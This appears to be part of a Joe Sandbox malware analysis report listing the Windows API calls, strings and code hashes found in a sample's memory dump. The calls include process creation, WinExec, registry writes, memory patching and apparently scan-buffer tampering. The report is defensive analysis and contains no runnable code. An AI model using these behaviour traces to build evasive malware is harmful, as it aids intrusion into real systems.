• Sleep.KERNEL32(0000000A,00000000,?), ref: 02DB1B31
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: c5146fc8c64ceb0527b69515ed7ad316c5a2b62f08b48537da0f32892f051818
• Instruction ID: e19b282c266b2183d6713acdacc8af8dc6b342a82d157325434577ad05b2acfc
• Opcode Fuzzy Hash: c5146fc8c64ceb0527b69515ed7ad316c5a2b62f08b48537da0f32892f051818
• Instruction Fuzzy Hash: 4251CE71A40240CFDB16CF68C9B8796BBE0EF46315F1881AED44A8B382D770D885CBA5

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DCE5F6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: cb34e028d2bbaae4bc5bec2b7c2b903a745c975875d9f9776284e30d5b6fbd2d
• Instruction ID: 17cab2fc2ea6b27c36e9349bc5e8f0bcb84cfaffa143767c996f7f7dea4156fb
• Opcode Fuzzy Hash: cb34e028d2bbaae4bc5bec2b7c2b903a745c975875d9f9776284e30d5b6fbd2d
• Instruction Fuzzy Hash: E1413175B50149DBEB02FBA4D861EDE73BAEF88700F60442AE042E7342DA34ED058F65
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 3130163322-2353454454
• Opcode ID: bdc09d97a2a43cd6d35cda751dbf77a4e32fffbf99f2195a753f5b92f1b0ad6f
• Instruction ID: d1701634682a01734cce39138970127d4c797ce59d8dba013638226697bad8af
• Opcode Fuzzy Hash: bdc09d97a2a43cd6d35cda751dbf77a4e32fffbf99f2195a753f5b92f1b0ad6f
• Instruction Fuzzy Hash: D311D3B2684249AFEB42EEA9EC51F9A77EDEB4C700FA14414BA09D3700C634ED509B24
APIs
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
  • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
• WinExec.KERNEL32(?,?), ref: 02DC8624
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c0141b7e6f578cfa7f9cbea6b31e07bd962499bce3e055bd173477f5a294b20d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d18bb311103f4e450a6484769faee6bc3cc11aa263cbf392281359116d32803
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0141b7e6f578cfa7f9cbea6b31e07bd962499bce3e055bd173477f5a294b20d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F016D706C4289AFEB02EAA5EC25F9AB7E9EB48700FA14424B901D3740D670AD109A24
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02DC8624
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c460016e78bd92f26b5c767a058edbb9877acf5a7440e48d7a4ede1742d9d482
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1d4f50c62438906bb950bb3ffb10a5b2b4b9aabfcfbf40d86fbd994da00eed4c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c460016e78bd92f26b5c767a058edbb9877acf5a7440e48d7a4ede1742d9d482
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F081706C4289EFEB02EBA5EC25F9EB7EDEB48700FA14424F901D3740D670AD109A34
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DC5C88
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DC5CB6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DC3900,02DC5CF6,00000000,02DC5D74,?,?,02DC3900), ref: 02DB7DAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DC3900,02DC5D11,00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DB7FB7
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DC5D1B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02DBC3D9,00000000,02DBC433), ref: 02DBA797
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 503785936-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f6f9e943804570c88df048486ed8da59cbdd9148c19298f677b85cb46d2084be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b360a0f5b4f3aa236693572ee464826acf47cf86d44ec73dcaee2b8cc063e231
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6f9e943804570c88df048486ed8da59cbdd9148c19298f677b85cb46d2084be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07319170A006099FDB02EBA4D891BDDB7F6EF48700F908069D505BB380D7756D048FB1
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02F2BA58), ref: 02DCF258
                                                                                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF290
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(000008FC,000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF29B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02F2BA58), ref: 02DCF258
• RegSetValueExA.ADVAPI32(000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF290
• RegCloseKey.ADVAPI32(000008FC,000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF29B
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
• SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4D5B
• SysFreeString.OLEAUT32(00000000), ref: 02DB4D6D
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
APIs
• SysFreeString.OLEAUT32(?), ref: 02DC73DA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3cd3a34194db0859d6b0f23a1ba2772e3e2c3a75eb2b44d4442eb718d7283586
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: feed3dab87df3f396c0f125ead22a011db87e882d79171ba14e85e3b24a0bdcf
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cd3a34194db0859d6b0f23a1ba2772e3e2c3a75eb2b44d4442eb718d7283586
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B1DC74A01609DFEB11CFA9E480A9DFBBAFF89314F248169E855AB324D730AC45CF50
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02DBE781
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBE364: VariantClear.OLEAUT32(?), ref: 02DBE373
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d219764d28b140a216be6aa92463a587a4df37144d1e61e2b79933a07f3cd03
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffed062bfefa469e949d56ac0606e6e3f9af54136d84f36c587b75c972e879bc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d219764d28b140a216be6aa92463a587a4df37144d1e61e2b79933a07f3cd03
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B511A964710610CBCB33AF29C8E4AE677DAEF84750F90846AE54B8B716DB30CC41CA71
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c051c7ccfe06b7ef7af4d1fe07d3ebc400e182b1f82216553cff0c48f962e640
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: da47586208fa8566e15ae32e7f5f393c622abd49087b4b14b0b4a7eb044abdc8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c051c7ccfe06b7ef7af4d1fe07d3ebc400e182b1f82216553cff0c48f962e640
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79314C71A00219EFDB12DFA8D8A8AEA77A8EF0C304F944565E94AD3340D734DD50CBA1
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1478290883-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06790c89a3a632d084531be27cfcae17dc6fabb36de72943e8e3cdad31144f99
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d8aa194aa4d9ece74ddf9d4269f9be9bd45bbb599337cec7f878d6ed379ee61
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06790c89a3a632d084531be27cfcae17dc6fabb36de72943e8e3cdad31144f99
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9212FB0AC0205BAFB42EBB5DC26B9EB7DADF04701F605468B505E7380DA74AD409E68
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02DC6DB9,?,?,?,00000000), ref: 02DC6D99
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4C60: SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: 95cdb8b2864b5eb9c4c95f2b0b52fa00a62c77b4433089ea05c639d952adcbc8
• Instruction ID: 75f5d410e9ef3539a385bc7cfa18a9a6aa947bfc2a0ae1aa23209d8d8c671b60
• Opcode Fuzzy Hash: 95cdb8b2864b5eb9c4c95f2b0b52fa00a62c77b4433089ea05c639d952adcbc8
• Instruction Fuzzy Hash: 75E0E535600208BFE712EB62EC61D8E77ADDFCA710F6104B5E40193700E975AD0488B0
APIs
• GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DB5886
